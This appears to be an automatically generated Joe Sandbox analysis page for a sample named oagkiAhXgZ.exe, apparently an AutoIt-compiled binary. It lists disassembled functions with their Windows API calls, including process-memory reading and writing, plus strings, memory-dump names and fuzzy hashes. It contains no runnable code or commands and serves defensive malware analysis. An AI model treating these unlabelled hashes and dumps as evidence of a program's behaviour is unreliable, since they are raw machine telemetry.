Function 00AB95C5 Relevance: 7.5, APIs: 5, Instructions: 29COMMON

Download Yara Rule

APIs

EndPath.GDI32(?), ref: 00AB95D4
StrokeAndFillPath.GDI32(?,?,00AF71F7,00000000,?,?,?), ref: 00AB95F0
SelectObject.GDI32(?,00000000), ref: 00AB9603
DeleteObject.GDI32 ref: 00AB9616
StrokePath.GDI32(?), ref: 00AB9631

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: Path$ObjectStroke$DeleteFillSelect
String ID:
API String ID: 2625713937-0
Opcode ID: 2a7cefe96edfff1e052ce37b9988dfb2f9db8c254e400dee032d2aed9866e059
Instruction ID: 1ce0757963b7c014628822a71ef7c0e40d138449d236fbe02914cd6b0965b9ed
Opcode Fuzzy Hash: 2a7cefe96edfff1e052ce37b9988dfb2f9db8c254e400dee032d2aed9866e059
Instruction Fuzzy Hash: 78F0B631005644EBDB265FADED187A97F65AB01322F148614E66A660F2CF308997DF20

Function 00AD0F47 Relevance: 7.4, APIs: 2, Strings: 2, Instructions: 389COMMONLIBRARYCODE

Download Yara Rule

APIs

__freea.LIBCMT ref: 00AD10F9
__freea.LIBCMT ref: 00AD1117

Part of subcall function 00AD1537: _free.LIBCMT ref: 00AD154F

Strings

a/p, xrefs: 00AD11DE
am/pm, xrefs: 00AD117A

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: __freea$_free
String ID: a/p$am/pm
API String ID: 3432400110-3206640213
Opcode ID: 4e4d5394e595068a5e48becf6627032d189b366139d6e9935c9a534385d10058
Instruction ID: 14f94ea2cf28f25464f0d1c2fd10fb1c8c20ddc492500320847321e6947d5e0c
Opcode Fuzzy Hash: 4e4d5394e595068a5e48becf6627032d189b366139d6e9935c9a534385d10058
Instruction Fuzzy Hash: A8D1F031900206EADB689F68C989BFAB7B1EF05700F28426BE9079F751D3759D80CB91

Function 00B27B7E Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 230COMMON

Download Yara Rule

APIs

Part of subcall function 00AC0242: EnterCriticalSection.KERNEL32(00B7070C,00B71884,?,?,00AB198B,00B72518,?,?,?,00AA12F9,00000000), ref: 00AC024D
Part of subcall function 00AC0242: LeaveCriticalSection.KERNEL32(00B7070C,?,00AB198B,00B72518,?,?,?,00AA12F9,00000000), ref: 00AC028A

Part of subcall function 00AA9CB3: _wcslen.LIBCMT ref: 00AA9CBD

Part of subcall function 00AC00A3: __onexit.LIBCMT ref: 00AC00A9

__Init_thread_footer.LIBCMT ref: 00B27BFB

Part of subcall function 00AC01F8: EnterCriticalSection.KERNEL32(00B7070C,?,?,00AB8747,00B72514), ref: 00AC0202
Part of subcall function 00AC01F8: LeaveCriticalSection.KERNEL32(00B7070C,?,00AB8747,00B72514), ref: 00AC0235

Strings

Variable must be of type 'Object'., xrefs: 00B27C3A
G, xrefs: 00B27C7F
5, xrefs: 00B27C78

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: CriticalSection$EnterLeave$Init_thread_footer__onexit_wcslen
String ID: 5$G$Variable must be of type 'Object'.
API String ID: 535116098-3733170431
Opcode ID: 27d5f75640a65c8f487aba3f7f489f04a6ec1aa98af4bff7f312e5d095fa963e
Instruction ID: f1a214c85a3064e782589bdb183afa5db492d522fdb668a20c1756f81c97dc88
Opcode Fuzzy Hash: 27d5f75640a65c8f487aba3f7f489f04a6ec1aa98af4bff7f312e5d095fa963e
Instruction Fuzzy Hash: 3D919E70A44219EFCB14EF94E990DADB7F1FF49340F108099F80A6B2A2DB31AE41CB55

Function 00B02716 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 121windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00B0B403: WriteProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00B021D0,?,?,00000034,00000800,?,00000034), ref: 00B0B42D

SendMessageW.USER32(?,00001104,00000000,00000000), ref: 00B02760

Part of subcall function 00B0B3CE: ReadProcessMemory.KERNEL32(?,?,?,00000000,00000000,00000000,?,00B021FF,?,?,00000800,?,00001073,00000000,?,?), ref: 00B0B3F8

Part of subcall function 00B0B32A: GetWindowThreadProcessId.USER32(?,?), ref: 00B0B355
Part of subcall function 00B0B32A: OpenProcess.KERNEL32(00000438,00000000,?,?,?,00B02194,00000034,?,?,00001004,00000000,00000000), ref: 00B0B365
Part of subcall function 00B0B32A: VirtualAllocEx.KERNEL32(00000000,00000000,?,00001000,00000004,?,?,00B02194,00000034,?,?,00001004,00000000,00000000), ref: 00B0B37B

SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00B027CD
SendMessageW.USER32(?,00001111,00000000,00000000), ref: 00B0281A

Strings

@, xrefs: 00B02832

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: Process$MessageSend$Memory$AllocOpenReadThreadVirtualWindowWrite
String ID: @
API String ID: 4150878124-2766056989
Opcode ID: fdd48bb80db5a5290575e8bdfce70db1beebf170314ffb9bf7721165eadf36c7
Instruction ID: 357e3fe2aee6a53a5459dca160670608ca2b77766ff78c4819a080f5b5fc8819
Opcode Fuzzy Hash: fdd48bb80db5a5290575e8bdfce70db1beebf170314ffb9bf7721165eadf36c7
Instruction Fuzzy Hash: 7E41EB76900218AFDB10DFA4CD46EEEBBB8EF09700F108095FA55B7191DB716E49CBA1

Function 00AD172E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 115COMMON

Download Yara Rule

APIs

GetModuleFileNameW.KERNEL32(00000000,C:\Users\user\Desktop\oagkiAhXgZ.exe,00000104), ref: 00AD1769
_free.LIBCMT ref: 00AD1834
_free.LIBCMT ref: 00AD183E

Strings

C:\Users\user\Desktop\oagkiAhXgZ.exe, xrefs: 00AD1760, 00AD1767, 00AD1796, 00AD17CE

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: _free$FileModuleName
String ID: C:\Users\user\Desktop\oagkiAhXgZ.exe
API String ID: 2506810119-3755894309
Opcode ID: deafea1c00ed99ed810e23e65adcde30bd0e328e1731a0f26bde168b7d6c42fe
Instruction ID: 4410268bc959d563fa023d2025b4fbfe26ebdc19dcc157895ebc05152ab91525
Opcode Fuzzy Hash: deafea1c00ed99ed810e23e65adcde30bd0e328e1731a0f26bde168b7d6c42fe
Instruction Fuzzy Hash: 11316E75A00218BFDB21DB99D985D9EBBFCEB95310B1441A7F806D7321DA708E80DBA0

Function 00B0C27D Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 114windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(00000004,00000000,00000000,?), ref: 00B0C306
DeleteMenu.USER32(?,00000007,00000000), ref: 00B0C34C
DeleteMenu.USER32(?,00000000,00000000,?,00000000,00000000,00B71990,015C5520), ref: 00B0C395

Strings

0, xrefs: 00B0C2DF

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: Menu$Delete$InfoItem
String ID: 0
API String ID: 135850232-4108050209
Opcode ID: e6f6d05b97cf3a773d8c0821cafea4e367f7346507f69f92f8aeffc6f9c14199
Instruction ID: a6b6bd5a3c21b4808a24be65918b4e207cc90b73be098e1057cc0bc476d3b6a2
Opcode Fuzzy Hash: e6f6d05b97cf3a773d8c0821cafea4e367f7346507f69f92f8aeffc6f9c14199
Instruction Fuzzy Hash: F5418E312043019FD720DF25D885B5ABFE4EF85360F148B9DF9A5972D2DB30A904CB66

Function 00B34416 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 106COMMON

Download Yara Rule

APIs

SetWindowPos.USER32(00000000,00000000,00000000,00000000,00000000,00000000,00000013,?,?,SysTreeView32,00B3CC08,00000000,?,?,?,?), ref: 00B344AA
GetWindowLongW.USER32 ref: 00B344C7
SetWindowLongW.USER32(?,000000F0,00000000), ref: 00B344D7

Strings

SysTreeView32, xrefs: 00B3447C

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: Window$Long
String ID: SysTreeView32
API String ID: 847901565-1698111956
Opcode ID: 3b97133095614dec1498e9ae1cf71a88c30836c924ca0a0054bfe3126cfa12ee
Instruction ID: a6ae8271684213eb9a162112d64250ccbfd13840d0c099dc2cdba9bb95fd6ee4
Opcode Fuzzy Hash: 3b97133095614dec1498e9ae1cf71a88c30836c924ca0a0054bfe3126cfa12ee
Instruction Fuzzy Hash: 29317A32210605ABDB209E78DC45BEA7BA9EB09324F314765F979A32E1DB70EC509B50

Function 00B2304E Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 90networkCOMMON

Download Yara Rule

APIs

Part of subcall function 00B2335B: WideCharToMultiByte.KERNEL32(00000000,00000000,?,?,00000000,00000000,00000000,00000000,?,?,?,?,?,00B23077,?,?), ref: 00B23378

inet_addr.WSOCK32(?,?,?,?,?,00000000), ref: 00B2307A
_wcslen.LIBCMT ref: 00B2309B
htons.WSOCK32(00000000,?,?,00000000), ref: 00B23106

Strings

255.255.255.255, xrefs: 00B23095, 00B2309A

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: ByteCharMultiWide_wcslenhtonsinet_addr
String ID: 255.255.255.255
API String ID: 946324512-2422070025
Opcode ID: 90a009e40daaf348951560aeeea3cb39e1ebbb6150eae2b12b0ac4ecb6db92f1
Instruction ID: 00e8e479f67fac034b68db2fcf4ebfb100984c38b5561a377fb99da998882f8d
Opcode Fuzzy Hash: 90a009e40daaf348951560aeeea3cb39e1ebbb6150eae2b12b0ac4ecb6db92f1
Instruction Fuzzy Hash: C131F3392002219FCB10CF68D586FAA77E0EF14718F248099E8199B392CB3AEF41C770

Function 00B34653 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 87windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000469,?,00000000), ref: 00B34705
SendMessageW.USER32(00000000,00000465,00000000,80017FFF), ref: 00B34713
DestroyWindow.USER32(00000000,00000000,?,?,?,00000000,msctls_updown32,00000000,00000000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 00B3471A

Strings

msctls_updown32, xrefs: 00B34684

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: MessageSend$DestroyWindow
String ID: msctls_updown32
API String ID: 4014797782-2298589950
Opcode ID: 5f09a37cf29e9105cebd25b24352c8a863b182c88fb63cfa9b442ced9c2382ef
Instruction ID: 2e815d4b9ed2d0562351274e688b4677be74f74a5424f697d2a4cdaef2dfe3d9
Opcode Fuzzy Hash: 5f09a37cf29e9105cebd25b24352c8a863b182c88fb63cfa9b442ced9c2382ef
Instruction Fuzzy Hash: 08214CB5600208AFDB10DF68DC81DAA37EDEB5A3A4B140499FA059B291CB70FC52CA60

Function 00B095AD Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 85COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00B0961D

Strings

#requireadmin, xrefs: 00B095D9
#OnAutoItStartRegister, xrefs: 00B095F3
#notrayicon, xrefs: 00B095B7

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: _wcslen
String ID: #OnAutoItStartRegister$#notrayicon$#requireadmin
API String ID: 176396367-2734436370
Opcode ID: e4f58c92f9fe0c57b65f5e7141e6ea34cf82850e8652e2c4459714617006c5ac
Instruction ID: 49f23dc81f8686a6fc344ffdea7b474c6cfbbb85b2bec0650d46455f8baf50ed
Opcode Fuzzy Hash: e4f58c92f9fe0c57b65f5e7141e6ea34cf82850e8652e2c4459714617006c5ac
Instruction Fuzzy Hash: B02157722046116AD331BB259D42FBBBBD8EFA5300F14406AF949970C3EB66ED41C3D5

Function 00B337B7 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000180,00000000,?), ref: 00B33840
SendMessageW.USER32(?,00000186,00000000,00000000), ref: 00B33850
MoveWindow.USER32(00000000,?,?,?,?,00000000,?,?,Listbox,00000000,00000000,?,?,?,?,?), ref: 00B33876

Strings

Listbox, xrefs: 00B3380F

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: MessageSend$MoveWindow
String ID: Listbox
API String ID: 3315199576-2633736733
Opcode ID: 2112801a539cdb9e4d5cbe19b0ca1418a930435dc3b23b4419dcd9986a877fd1
Instruction ID: b0a9ee486d5003ea2cec3daa219ec71a0c0f8276e6cc521e0d1931f7a0075eec
Opcode Fuzzy Hash: 2112801a539cdb9e4d5cbe19b0ca1418a930435dc3b23b4419dcd9986a877fd1
Instruction Fuzzy Hash: 0A21A472610218BBEF218F54DC85FBB37EEEF89B54F218154F9059B190CA71DC5287A0

Function 00B149F4 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 78COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00B14A08
GetVolumeInformationW.KERNEL32(?,?,00007FFF,?,00000000,00000000,00000000,00000000), ref: 00B14A5C
SetErrorMode.KERNEL32(00000000,?,?,00B3CC08), ref: 00B14AD0

Strings

%lu, xrefs: 00B14A6F

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: ErrorMode$InformationVolume
String ID: %lu
API String ID: 2507767853-685833217
Opcode ID: ad8ce5dfd99672438e667a9fb036fd3a118637981aae1b03ca3b480c8fba20d7
Instruction ID: 1447aaa2aa708bdca3bfd3dc56399def61ea26b820e69b992986dca5b828122e
Opcode Fuzzy Hash: ad8ce5dfd99672438e667a9fb036fd3a118637981aae1b03ca3b480c8fba20d7
Instruction Fuzzy Hash: 09316575A00109AFD710DF54C985EAEBBF8EF09318F148095F509EB262DB71ED45CB61

Function 00B341EB Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(00000000,00000405,00000000,00000000), ref: 00B3424F
SendMessageW.USER32(?,00000406,00000000,00640000), ref: 00B34264
SendMessageW.USER32(?,00000414,0000000A,00000000), ref: 00B34271

Strings

msctls_trackbar32, xrefs: 00B34226

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: MessageSend
String ID: msctls_trackbar32
API String ID: 3850602802-1010561917
Opcode ID: 8781df4b4f7c05d5d42453fb9d0d912892bbba8e32bd7d287d740a031ef7ece9
Instruction ID: 48f35ef448706b0fed6d969a13451bece13363efba99369aeb4a35183aae39e9
Opcode Fuzzy Hash: 8781df4b4f7c05d5d42453fb9d0d912892bbba8e32bd7d287d740a031ef7ece9
Instruction Fuzzy Hash: 6D119E31250248BEEF205E69CC46FAB3BECEB95B64F214524FA55E60A0D671E8519B20

Function 00B02F52 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 67windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00AA6B57: _wcslen.LIBCMT ref: 00AA6B6A

Part of subcall function 00B02DA7: SendMessageTimeoutW.USER32(?,00000000,00000000,00000000,00000002,00001388,?), ref: 00B02DC5
Part of subcall function 00B02DA7: GetWindowThreadProcessId.USER32(?,00000000), ref: 00B02DD6
Part of subcall function 00B02DA7: GetCurrentThreadId.KERNEL32 ref: 00B02DDD
Part of subcall function 00B02DA7: AttachThreadInput.USER32(00000000,?,00000000,00000000), ref: 00B02DE4

GetFocus.USER32 ref: 00B02F78

Part of subcall function 00B02DEE: GetParent.USER32(00000000), ref: 00B02DF9

GetClassNameW.USER32(?,?,00000100), ref: 00B02FC3
EnumChildWindows.USER32(?,00B0303B), ref: 00B02FEB

Strings

%s%d, xrefs: 00B02FFF

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: Thread$AttachChildClassCurrentEnumFocusInputMessageNameParentProcessSendTimeoutWindowWindows_wcslen
String ID: %s%d
API String ID: 1272988791-1110647743
Opcode ID: cd3b5e3f3448e9616aafd2b04ab3d5a4da59151f778f63777a925cafb48f4191
Instruction ID: c7487b750f10b20e313aea07aa0f158331cc09a25511bcd4d21883ea8e1f4953
Opcode Fuzzy Hash: cd3b5e3f3448e9616aafd2b04ab3d5a4da59151f778f63777a925cafb48f4191
Instruction Fuzzy Hash: 8111A2716002056BDF157FA48D8AFED7BEEAF84304F1440B9F909AB1D2DE3099498B70

Function 00B35882 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00B358C1
SetMenuItemInfoW.USER32(?,?,?,00000030), ref: 00B358EE
DrawMenuBar.USER32(?), ref: 00B358FD

Strings

0, xrefs: 00B3588F

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID: Menu$InfoItem$Draw
String ID: 0
API String ID: 3227129158-4108050209
Opcode ID: 8da3067d1865d2d9506a348703f8fc4c81174d34445cb0aaf5e6e88721f3b165
Instruction ID: 7bb82e104463b28752491e38a6aa6c01701ec2aec429442bd868a5a4684bdd50
Opcode Fuzzy Hash: 8da3067d1865d2d9506a348703f8fc4c81174d34445cb0aaf5e6e88721f3b165
Instruction Fuzzy Hash: CE012D31500218EFDB219F51DC85BEEBBB9FB45361F2480D9E849D6251DB309A94EF31

Function 00B0007F Relevance: 6.3, APIs: 4, Instructions: 322COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B62000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066362082.0000000000B6C000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066379836.0000000000B74000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_aa0000_oagkiAhXgZ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5770f61f7d5c910dde0dc6a70c425a9cfbcd4b7c9d5809f0455f20a5ba8048b5
Instruction ID: 1d984fb823ecd9b972eb288014b59259ecf6dc4f349f0b03f52d86de6a809bb9
Opcode Fuzzy Hash: 5770f61f7d5c910dde0dc6a70c425a9cfbcd4b7c9d5809f0455f20a5ba8048b5
Instruction Fuzzy Hash: 71C13775A1020AEFDB15DFA4C894BAEBBB5FF48304F208598E505EB291D731EE41CB94

Function 00B2342E Relevance: 6.3, APIs: 4, Instructions: 257COMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 00B23459
CoUninitialize.OLE32 ref: 00B23463
VariantInit.OLEAUT32(?), ref: 00B2346E
VariantClear.OLEAUT32(?), ref: 00B2371B

Memory Dump Source

Source File: 00000000.00000002.2066245950.0000000000AA1000.00000020.00000001.01000000.00000003.sdmp, Offset: 00AA0000, based on PE: true

Associated: 00000000.00000002.2066225058.0000000000AA0000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2066314596.0000000000B3C000.00000002.00000001.01000000.00000003.sdmpDownload File
